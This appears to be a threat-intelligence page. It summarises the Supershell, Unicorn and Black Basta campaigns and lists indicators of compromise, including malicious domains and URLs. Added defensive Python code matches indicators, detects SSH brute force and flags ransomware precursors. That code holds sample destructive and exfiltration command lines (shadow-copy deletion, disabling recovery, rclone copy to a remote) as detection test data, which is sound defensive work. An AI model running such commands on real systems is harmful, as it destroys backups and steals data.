FileHash-SHA256 c78a02fa928ed8f83bda56d4b269152074f512c2cb73d59b2029bfc50ac2b8bc
FileHash-SHA256 cef0d2834613a3da4befa2f56ef91afc9ab82b1e6c510d2a619ed0c1364032b8
FileHash-SHA256 d23dd576f7a44df0d44fca6652897e4de751fdb0becc6b14b754ac9aafc9081c
FileHash-SHA256 d3c1ada67f9fe46dfb11f72c1754667d2ccd0026d48d37b61192e3d0ef369b84
FileHash-SHA256 e9854ab68dad0a744925118bfae4ec6ce9c4b7727e2ad6763aa50b923991de95
domain visualstudio-microsoft.com
hostname api.s2cloud-amazon.com
hostname ms1.hinet.lat
hostname msa.hinet.ink
hostname rocean.oca.pics
hostname static.trendmicrotech.com
hostname status.s3cloud-azure.com
hostname us2.s3bucket-azure.online
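Each pulse on this page is a plain "Type Indicator" table mixing hashes, IPs, CVEs, domains and hostnames, and the Earth Baxia list above is a good one to test a consumer against because it carries all of those types. The following is an added example for this page, not Trend Micro's or OTX's code: it parses that format, compares a file's MD5, SHA-1 and SHA-256 against the hash indicators, and matches observed names exactly against hostname indicators and by suffix against domain indicators. PULSE_TEXT copies a few lines from the list above; the sample file, and the single hash line appended for it so the file path can be exercised, are constructed.

```python
"""Parse OTX-style 'Type Indicator' lines and match files and names against them.
Added example for this page; the indicator excerpt is copied from the Earth
Baxia pulse above, the demo file and its hash line are constructed."""
import hashlib
from collections import defaultdict

PULSE_TEXT = """\
Type Indicator
IPv4 167.172.89.142
CVE CVE-2024-36401
hostname static.krislab.site
FileHash-MD5 249c2d77aa53c36b619bdfbf02a817e5
FileHash-SHA256 04b336c3bcfe027436f36dfc73a173c37c66288c7160651b11561b39ce2cd25e
domain visualstudio-microsoft.com
hostname api.s2cloud-amazon.com
"""

# Constructed stand-in for a file under investigation (not a real payload).
DEMO_FILE = b"MZ\x90\x00constructed sample for the hash-matching demo"
DEMO_SHA256 = hashlib.sha256(DEMO_FILE).hexdigest()
DEMO_PULSE = PULSE_TEXT + "FileHash-SHA256 " + DEMO_SHA256 + "\n"  # constructed line

HASH_TYPES = {"FileHash-MD5": "md5", "FileHash-SHA1": "sha1", "FileHash-SHA256": "sha256"}


def parse_pulse(text):
    """Return {indicator_type: set(values)}; skips the header line and
    lower-cases hashes and names so later comparisons are case-insensitive."""
    iocs = defaultdict(set)
    for line in text.splitlines():
        parts = line.strip().split(None, 1)
        if len(parts) != 2 or parts[0] == "Type":
            continue
        typ, value = parts
        if typ in HASH_TYPES or typ in ("domain", "hostname"):
            value = value.lower()
        iocs[typ].add(value)
    return iocs


def file_hashes(data):
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def match_file(data, iocs):
    """Return (indicator_type, digest) for the first hit, else None. All three
    digests are checked because a pulse may list a sample under only one algorithm."""
    digests = file_hashes(data)
    for typ, alg in HASH_TYPES.items():
        if digests[alg] in iocs.get(typ, ()):
            return typ, digests[alg]
    return None


def match_name(name, iocs):
    """Exact match on hostname indicators; suffix match on domain indicators so
    any host under a listed domain hits (cdn.evil.example matches 'evil.example')."""
    name = name.lower().rstrip(".")
    if name in iocs.get("hostname", ()):
        return "hostname", name
    labels = name.split(".")
    for i in range(len(labels) - 1):
        parent = ".".join(labels[i:])
        if parent in iocs.get("domain", ()):
            return "domain", parent
    return None


if __name__ == "__main__":
    iocs = parse_pulse(DEMO_PULSE)
    print(match_file(DEMO_FILE, iocs))
    print(match_name("cdn.visualstudio-microsoft.com", iocs))
    print(match_name("STATIC.krislab.site.", iocs))
```

The suffix rule is deliberate: a hostname indicator such as static.krislab.site only proves that one host is bad, so it is matched exactly, while a domain indicator covers every name beneath it. A bare registrable name that appears only as part of a hostname indicator (krislab.site here) therefore does not match on its own.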
Supershell Malware Being Distributed to Linux SSH Servers A Chinese-developed Go-based backdoor called Supershell is targeting poorly managed Linux SSH servers. The malware, which supports multiple platforms, primarily functions as a reverse shell for remote system control. Attackers use dictionary attacks from various IP addresses to gain access, then install Supershell directly or via a downloader script. The malware is downloaded from web and FTP servers. While Supershell is the initial payload for control hijacking, XMRig Monero CoinMiners are often installed alongside it, suggesting cryptocurrency mining as the ultimate goal. To protect against such attacks, administrators should use strong passwords, update systems regularly, and implement security measures like firewalls.
Type Indicator
IPv4 107.189.8.15
FileHash-MD5 4ee4f1e7456bb2b3d13e93797b9efbd3
FileHash-MD5 5ab6e938028e6e9766aa7574928eb062
FileHash-MD5 e06a1ba2f45ba46b892bef017113af09
FileHash-SHA1 4b76040b0d4e2651f0c0a781c336ddebf8b8c057
FileHash-SHA1 a65ff070743b2bf15717e551b4be4e788fb25c08
FileHash-SHA1 c4e0241a4276cb15c95b52c673328de8abcf04b4
FileHash-SHA256 157bea84012ca8b8dc6c0eabf80db1f0256eafccf4047d3e4e90c50ed42e69ff
FileHash-SHA256 23dbfb99fc6c4fcfc279100c4b6481a7fd3f0b061b8d915604efa2ba37c8ddfa
FileHash-SHA256 cf5a7b7c71564a5eef77cc5297b9ffd6cd021eb44c0901ea3957cb2397b43e15
IPv4 45.15.143.197
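The Supershell pulse above describes the entry vector as dictionary attacks against SSH from many source IPs, so the place to catch it early is the sshd auth log. The following is an added example for this page, not AhnLab's or OTX's code: it parses syslog-style sshd lines, flags a source that produces a burst of failures, flags a password login accepted after failures from the same source (the dictionary attack succeeding), and cross-checks every source against the two IPv4 indicators listed above. The log lines are constructed, and the threshold of five failures in sixty seconds is an assumption to tune per environment.

```python
"""Flag SSH dictionary attacks in OpenSSH auth logs and cross-check source IPs
against the Supershell pulse. Added example; log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime

# Source IPs listed in the pulse's IoC table above.
PULSE_IPS = {"107.189.8.15", "45.15.143.197"}

# Syslog-style sshd lines as written to /var/log/auth.log or /var/log/secure.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Failed|Accepted)\s(?P<method>\S+)\sfor\s(?:invalid user\s)?"
    r"(?P<user>\S+)\sfrom\s(?P<ip>\d+(?:\.\d+){3})"
)

# Constructed sample log (not taken from the report).
SAMPLE_LOG = """\
Sep 20 03:14:01 host sshd[1201]: Failed password for root from 107.189.8.15 port 51022 ssh2
Sep 20 03:14:03 host sshd[1203]: Failed password for root from 107.189.8.15 port 51023 ssh2
Sep 20 03:14:05 host sshd[1205]: Failed password for invalid user admin from 107.189.8.15 port 51024 ssh2
Sep 20 03:14:07 host sshd[1207]: Failed password for invalid user oracle from 107.189.8.15 port 51025 ssh2
Sep 20 03:14:09 host sshd[1209]: Failed password for root from 107.189.8.15 port 51026 ssh2
Sep 20 03:14:11 host sshd[1211]: Accepted password for root from 107.189.8.15 port 51027 ssh2
Sep 20 03:20:00 host sshd[1300]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Sep 20 03:20:30 host sshd[1301]: Accepted publickey for alice from 192.0.2.10 port 40001 ssh2
Sep 20 04:00:00 host sshd[1400]: Failed password for invalid user test from 198.51.100.7 port 33000 ssh2
Sep 20 04:00:01 host sshd[1401]: Failed password for invalid user guest from 198.51.100.7 port 33001 ssh2
"""


def parse_events(log_text):
    """Return (timestamp, ip, user, accepted, method) tuples for sshd auth lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            events.append((ts, m["ip"], m["user"], m["result"] == "Accepted", m["method"]))
    return events


def analyze(log_text, fail_threshold=5, window_s=60):
    """Return {ip: verdict} for sources worth acting on."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[1]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if not e[3]]
        # Burst: fail_threshold failures inside window_s seconds (sliding window).
        burst = any(
            (fails[i + fail_threshold - 1][0] - fails[i][0]).total_seconds() <= window_s
            for i in range(len(fails) - fail_threshold + 1)
        )
        # A password login accepted after earlier failures from the same IP is
        # the dictionary attack succeeding; key-based logins are not counted.
        success_after = any(
            e[3] and e[4] == "password" and any(f[0] < e[0] for f in fails)
            for e in evs
        )
        known = ip in PULSE_IPS
        if burst or success_after or known:
            alerts[ip] = {
                "failures": len(fails),
                "distinct_users": len({e[2] for e in fails}),
                "burst": burst,
                "password_success_after_failures": success_after,
                "in_pulse": known,
            }
    return alerts


if __name__ == "__main__":
    for ip, verdict in analyze(SAMPLE_LOG).items():
        print(ip, verdict)
```

A source that hits all three conditions, as 107.189.8.15 does in the constructed log, is the case to treat as an active compromise rather than background scanning: check that host for a new reverse-shell process and for XMRig, which the pulse says is usually dropped alongside Supershell.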
Unicorn: New Spy Scripts Steal Data from Russian Companies A new malware campaign targeting Russian energy companies, factories, and electronic component suppliers has been detected. The malware, distributed via email attachments or Yandex Disk links, uses RAR archives containing LNK files to download and execute malicious HTA files. These files create VBS scripts that establish persistence through registry keys and scheduled tasks. The scripts copy files from the user's home directory and Telegram data, then exfiltrate them to the attacker's server. Unlike typical attacks, this malware remains active, continuously stealing new and modified files. The campaign shows no clear connection to known threat groups and is detected as Trojan-Spy.VBS.Unicorn.
Type Indicator
FileHash-MD5 54562bd71d5e0d025297b25d4cacb384
FileHash-MD5 625d30bf6f54d47611f23c514c1dd4d6
FileHash-MD5 8009657da8b46f851ff8e833169d839d
FileHash-MD5 86b4781b1ad041a3696df2efb269718f
FileHash-MD5 c9a941a305f68d726b1e49b965b5812d
URL https://yandex-drive.petition-change.org/file_preview/commecrial_list.pdf
URL https://support.petition-change.org/unicorn
Black Basta Ransomware: What You Need to Know Black Basta is a ransomware-as-a-service group that emerged in April 2022, known for double extortion tactics. They target organizations globally, particularly in North America, Europe, and Australia, affecting over 500 entities across various industries. Initial access is gained through phishing, Qakbot, Cobalt Strike, and vulnerability exploitation. The group uses tools like Mimikatz for credential theft and lateral movement. Their process involves data exfiltration using Rclone, followed by file encryption using the ChaCha20 algorithm. The ransomware disables system defenses, deletes shadow copies, and leaves a ransom note. Black Basta has been linked to the FIN7 threat actor due to similarities in EDR evasion techniques.
Type Indicator
FileHash-MD5 229ec577744224d4d2fb2091ac253dd8
FileHash-SHA1 497013697aba845b400d23bd774cf2ad09f4dae5
FileHash-SHA256 42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78
CVE CVE-2020-1472
CVE CVE-2021-34527
CVE CVE-2021-42278
CVE CVE-2021-42287
CVE CVE-2024-1709
CVE CVE-2024-26169
FileHash-MD5 00da1d47bc0d09a01121553fa2693f26
FileHash-MD5 0165ff14fa840c0074a7ee5108858f8d
FileHash-MD5 0bf7bc20496143a9f028e77ab47b4698
FileHash-MD5 1ce3b67e179c8420bd5b31e75b4427ca
FileHash-MD5 24544104aaa9931b8cc0c68622864488
FileHash-MD5 2a255e75f72ac142689082437a866c32
FileHash-MD5 2b7fc9dd400d92cc64627115b47a592f
FileHash-MD5 2c383f6fa25eea59fc54e5af19861fba
FileHash-MD5 2d5cefe02cef5d14da7d609f0ccad1bc
FileHash-MD5 2f90cd68e4a92c5151c6e43902397a13
FileHash-MD5 3f400f30415941348af21d515a2fc6a3
FileHash-MD5 403dee0dd3891459b22a8a37828b66b8
FileHash-MD5 470c803b32209fbeb09af80a1b83e6f2
FileHash-MD5 497ef4779c6770e4497adf0bc71655f1
FileHash-MD5 4c54bec464ba0c2b9d522643e1b3ebe7
FileHash-MD5 4e8a7b03ff758f5c75ce992615a14fd0
FileHash-MD5 59db7bd22d4ec503b768ece646205c27
FileHash-MD5 5c421d53680a56650df20fd71485ca0f
FileHash-MD5 640132bbf92eb7c794a5c593fbb362de
FileHash-MD5 6441d7260944bcedc5958c5c8a05d16d
FileHash-MD5 65e8bd5b9128574f1122527b32e1dc21
FileHash-MD5 6785c08d9b83fa5f94b9e07f3434d7ca
FileHash-MD5 6a202e9a95f58938d02385e31d43ed87
FileHash-MD5 6b010dcbc9c09b06b16e6a6cc6387a7b
FileHash-MD5 6d5b9675b68bac95b885b4bb294134a1
FileHash-MD5 6eb89be04f8c1823cfabd28f0f57139b
FileHash-MD5 6f01787f5f644916b2dda5b4295efa4f
FileHash-MD5 6f9f4b7e63692eb7dcbc0957d3e7530e
FileHash-MD5 7688c1b7a1124c1cd9413f4b535b2f44
FileHash-MD5 80ab6a4d16c8137308dea1dc7922bd47
FileHash-MD5 8bae9edbf5b1035cd52ca45b23fee29d
FileHash-MD5 97abffeaa7bdfaa81532bd6028498225
FileHash-MD5 9f727c56a415bf8ffa884ef241bbcd10
FileHash-MD5 a292fee8d8db83711e72c06d6f82562d
FileHash-MD5 a41afe748aed818ab6ac94e81bdde610
FileHash-MD5 adb3cf03e9be744107e61bd7de4c26bd
FileHash-MD5 afa27795c0c86b6afeb138d0fb09506b
FileHash-MD5 b365faebaf416681b5f376c8aa4f4470
FileHash-MD5 b648b7305df49492c44a1280ec2228a0
FileHash-MD5 bc95f228b11fa3b4e91c30d98f9f3bff
FileHash-MD5 c115bbbdb1a61f8c553d74802bfd78fb
FileHash-MD5 cddf2c9ac528b27af98da74dcb8d6ea0
FileHash-MD5 ce99e91e6c2a6defe1a86462870ba321
FileHash-MD5 d1ae751134e04bf6188aaed148409620
FileHash-MD5 d50a3b60eb046c5d7bc6768bd3d7f1b9
FileHash-MD5 d513a09a10122ba8cd6df651aae35fb0
FileHash-MD5 dd611cf3137868795121a44518139ca4
FileHash-MD5 e4d9351749d5b713b3838ba7b1fe8060
FileHash-MD5 e52aa8e50c0ccf883b7ab7f0c36bb878
FileHash-MD5 e7d5201947829fd265a0356771fbeb63
FileHash-MD5 e83d6092439a90af2b4b1db2ad3a9c5a
FileHash-MD5 eaaa577b690501adf1969b71e5636e0f
FileHash-MD5 ed891e4fd173700fac93b3dda30517c9
FileHash-MD5 eff424376edca5680b90ea9fedad163d
FileHash-MD5 f05dac112cd3174c385d10158b6080fb
FileHash-MD5 f309d2c8a5c82367f0fd2be457055813
FileHash-MD5 f74cec233a9609461e7518dd4c90207b
FileHash-MD5 ff2f71dffeb997583fd297695de8c4ae
FileHash-SHA1 0110e12ae768872ea5c1b194dba50cbf74ec4d84
FileHash-SHA1 0b0699b324dfcd6fc40abe39d2eef7d95f1dd782
FileHash-SHA1 1f439569e3c1c14ea9f02235f8f45c49e2764160
FileHash-SHA1 2084ae47dcdda6161c8697e995512448facba37c
FileHash-SHA1 25ce6c74a6f39289717522cad5eacdf5b9f4bae8
FileHash-SHA1 26ab576a0abf7085ecf6321a311a7b3088ee48ae
FileHash-SHA1 328a8793323f11c1d0c5f3ddedf4ae10caafb063
FileHash-SHA1 3c13c1e54d2d7991c1c3452ae89888a8e7a47763
FileHash-SHA1 4090622f0eadc1b420aa5d55e31ca5cd45e05f12
FileHash-SHA1 46257982840493eca90e051ff1749e7040895584
FileHash-SHA1 47dacafb5dace4c5fea931e9a7392f76fdde3e98
FileHash-SHA1 4da6fef533b37a12ed1e357df66802de29c1ab5c
FileHash-SHA1 530f9163be551b7488650542de31cdfd11307d63
FileHash-SHA1 53628c7a155ccb7af1135140083939018d3587f1
FileHash-SHA1 5644a0282ac420c46d3b43fbb409eb9f7842b3af
FileHash-SHA1 579b245a6609903d804f957083b9e0b2ed145f5a
FileHash-SHA1 591d363928f0d5f4629196d60fd899469267da09
FileHash-SHA1 6c90b89aad04f38c584fcee1d47fed9cd79f8ef1
FileHash-SHA1 6fe84c129f76d309032e26aba3c33ba0b64172e8
FileHash-SHA1 7131a6f16aa8534a9cec7e11e37423aea4c09784
FileHash-SHA1 74dbf463be3139a28d9851b3b80c2ecac3e56304
FileHash-SHA1 757932f6038b71c5dbc380a2f28b077b41fbce9b
FileHash-SHA1 79054b409cb1c7a36aafd9a9915f948e2f018734
FileHash-SHA1 796531afd0e828f451786c485f95c4c04084f461
FileHash-SHA1 7a33162908cba6678dc75d688da1f86b54849782
FileHash-SHA1 80a973c3da41c6479cc9d7036090adc1264c02a4
FileHash-SHA1 82f88c1af036181ee4e92a2f9338c152d1ff0c58
FileHash-SHA1 8bf65a11e42b5850e1a5f28513dae1ffc168730e
FileHash-SHA1 8ccac360e2ca37b2fa9f5fa81b22114fb8936120
FileHash-SHA1 8e714d9fdbc27d2aa9abdadc728c219623b1e573
FileHash-SHA1 9171f38c2a3115c3b21aba939a7c55cd9e726d9b
FileHash-SHA1 919c33adb648ce13ee8bd7c11bffbfd836936c00
FileHash-SHA1 92408a8233567f8b10f30f83dfcdd98effe96dca
FileHash-SHA1 9468012acf6df7a0e593f41e0da8123f541277df
FileHash-SHA1 9e24c4e231b93142419ac20e58dd71388f7d8ab7
FileHash-SHA1 a1a698a0bdda712905950ba6414bb1fcabdd8e84
FileHash-SHA1 a44a251e98a905adfedd46edb4541b2a92ae3a20
FileHash-SHA1 a977631006818fc5717b9fbce0609c58080a8ab2
FileHash-SHA1 aa54013aeb502b4a936331deb76a6411f1f1ade7
FileHash-SHA1 ad0e80af469165da713467b13d9a2500ee340427
FileHash-SHA1 b4c5c1e0690fdb1fc8abec8abcec8633d6d5c2bb
FileHash-SHA1 bd0bf9c987288ca434221d7d81c54a47e913600a
FileHash-SHA1 c419ed515b5267bb39870bdedcdd8dd8b172574c
FileHash-SHA1 c69ffb5061ec42c876531f153c5b94302d6d9daf
FileHash-SHA1 cc7ea6bb6787df664adb69022546c42f5f409653
FileHash-SHA1 ce77bd3224f47ae4b8a04bd4b4be91c3550de294
FileHash-SHA1 d32e44f7e04a8c84e7159ed020dcf26b6e51416e
FileHash-SHA1 db497b95c79e41212577db0ba06777b62db209ff
FileHash-SHA1 ddd40fb7335abc4ef736ecc12a909c6329783a05
FileHash-SHA1 e05e9cc2f28bcd17f5285a34db2894bad9ccd53a
FileHash-SHA1 e1caf6484d899e7bb4d0c72e8bea8ff718ff073a
FileHash-SHA1 ec944a8daaa706ff5557d7fedd17bc6ba21bf96d
FileHash-SHA1 f0ae322f5067b20ee89d9826dc806abdd610fb60
FileHash-SHA1 f3d31b5d4bec32a50e8a76430c801d1b8c4e6b70
FileHash-SHA1 f4553d3aa92d4c97353645451c531881e8f0991a
FileHash-SHA1 f502f703f6fc65ab91d80e8d581acaffb6a93695
FileHash-SHA1 fe540dd2ba50edb2ecbef0c0180e732ff2403592
FileHash-SHA1 ff57cda4829978d8b6f7f1f31356f291b37acaa6
FileHash-SHA256 0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94a
FileHash-SHA256 05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431
FileHash-SHA256 07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799
FileHash-SHA256 09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25
FileHash-SHA256 0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098e
FileHash-SHA256 0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81
FileHash-SHA256 0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0
FileHash-SHA256 0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1
FileHash-SHA256 0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481
FileHash-SHA256 1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80
FileHash-SHA256 15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4
FileHash-SHA256 17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90
FileHash-SHA256 17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20
FileHash-SHA256 1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779
FileHash-SHA256 1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250
FileHash-SHA256 1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087
FileHash-SHA256 1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e
FileHash-SHA256 203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248b
FileHash-SHA256 21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bda
FileHash-SHA256 3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35
FileHash-SHA256 3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622a
FileHash-SHA256 350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bd
FileHash-SHA256 360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98
FileHash-SHA256 37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004
FileHash-SHA256 39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8ead
FileHash-SHA256 3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250a
FileHash-SHA256 3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013b
FileHash-SHA256 449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9
FileHash-SHA256 462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7
FileHash-SHA256 46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2
FileHash-SHA256 48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bb
FileHash-SHA256 4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4
FileHash-SHA256 50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cb
FileHash-SHA256 51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3e
FileHash-SHA256 5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaa
FileHash-SHA256 53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408
FileHash-SHA256 58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bd
FileHash-SHA256 5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43
FileHash-SHA256 5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221
FileHash-SHA256 5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173
FileHash-SHA256 5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa
FileHash-SHA256 62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087
FileHash-SHA256 69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944
FileHash-SHA256 699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76
FileHash-SHA256 723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224
FileHash-SHA256 7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a
FileHash-SHA256 7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59
FileHash-SHA256 86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737
FileHash-SHA256 882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3
FileHash-SHA256 88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc
FileHash-SHA256 90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7
FileHash-SHA256 96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be
FileHash-SHA256 9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc
FileHash-SHA256 9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690f
FileHash-SHA256 9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7
FileHash-SHA256 a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386
FileHash-SHA256 a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1
FileHash-SHA256 a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6
FileHash-SHA256 ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54
FileHash-SHA256 ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277
FileHash-SHA256 acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f
FileHash-SHA256 ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e
FileHash-SHA256 affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abada
FileHash-SHA256 b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52e
FileHash-SHA256 b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9
FileHash-SHA256 cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfa
FileHash-SHA256 d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1
FileHash-SHA256 d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13
FileHash-SHA256 d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d
FileHash-SHA256 d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fc
FileHash-SHA256 d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9
FileHash-SHA256 dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ff
FileHash-SHA256 dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3
FileHash-SHA256 df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415
FileHash-SHA256 df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3
FileHash-SHA256 e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757
FileHash-SHA256 f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4
FileHash-SHA256 f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93
FileHash-SHA256 fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08
FileHash-SHA256 fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f
domain kekeoamigo.com
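The Black Basta summary above lists the behaviours that precede encryption: exfiltration with Rclone, then deleting shadow copies and disabling system recovery. Those show up as process command lines before any file is encrypted, which is where a detection has the most value. The following is an added example for this page, not Black Basta's or any vendor's code: it runs a small rule set over constructed process-creation events and raises severity when exfiltration and a defence-impact action are seen on the same host, the double-extortion sequence the pulse describes. The rule patterns are assumed detection logic, not signatures from the report.

```python
"""Rule-based detection of Black Basta pre-encryption behaviours over
process-creation events. Added example; events and patterns are constructed."""
import re
from collections import defaultdict

# Patterns run over the lower-cased command line of each process-creation event.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b"
        r"|\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b"
    ),
    "recovery_disabled": re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b"),
    "rclone_exfil": re.compile(r"\brclone(?:\.exe)?\b.*\b(?:copy|sync|move)\b"),
}

# Constructed process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "user": "CORP\\jdoe", "cmdline": r"rclone.exe copy C:\Finance remote:bucket --transfers 32"},
    {"host": "WS02", "user": "CORP\\backup", "cmdline": r"vssadmin.exe list shadows"},
    {"host": "WS03", "user": "NT AUTHORITY\\SYSTEM", "cmdline": r"bcdedit /set {default} recoveryenabled no"},
    {"host": "WS04", "user": "CORP\\alice", "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]


def evaluate(events):
    """Return {host: {rule_name: [cmdline, ...]}} for events matching any rule."""
    hits = defaultdict(lambda: defaultdict(list))
    for ev in events:
        cmd = ev["cmdline"].lower()
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits[ev["host"]][name].append(ev["cmdline"])
    return {host: dict(rules) for host, rules in hits.items()}


def triage(events):
    """Severity per host: 'high' when exfiltration and a defence-impact rule
    both fire on the same host, 'medium' for a single behaviour."""
    verdicts = {}
    for host, rules in evaluate(events).items():
        impact = {"shadow_copy_deletion", "recovery_disabled"} & set(rules)
        verdicts[host] = "high" if "rclone_exfil" in rules and impact else "medium"
    return verdicts


if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS).items():
        print(host, severity, sorted(evaluate(SAMPLE_EVENTS)[host]))
```

Listing shadow copies (WS02) is deliberately not matched, since backup software does that routinely; the patterns key on the destructive verbs. In production the same correlation should be bounded by a time window and fed by the file-hash indicators in the table above for the loader and encryptor themselves.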
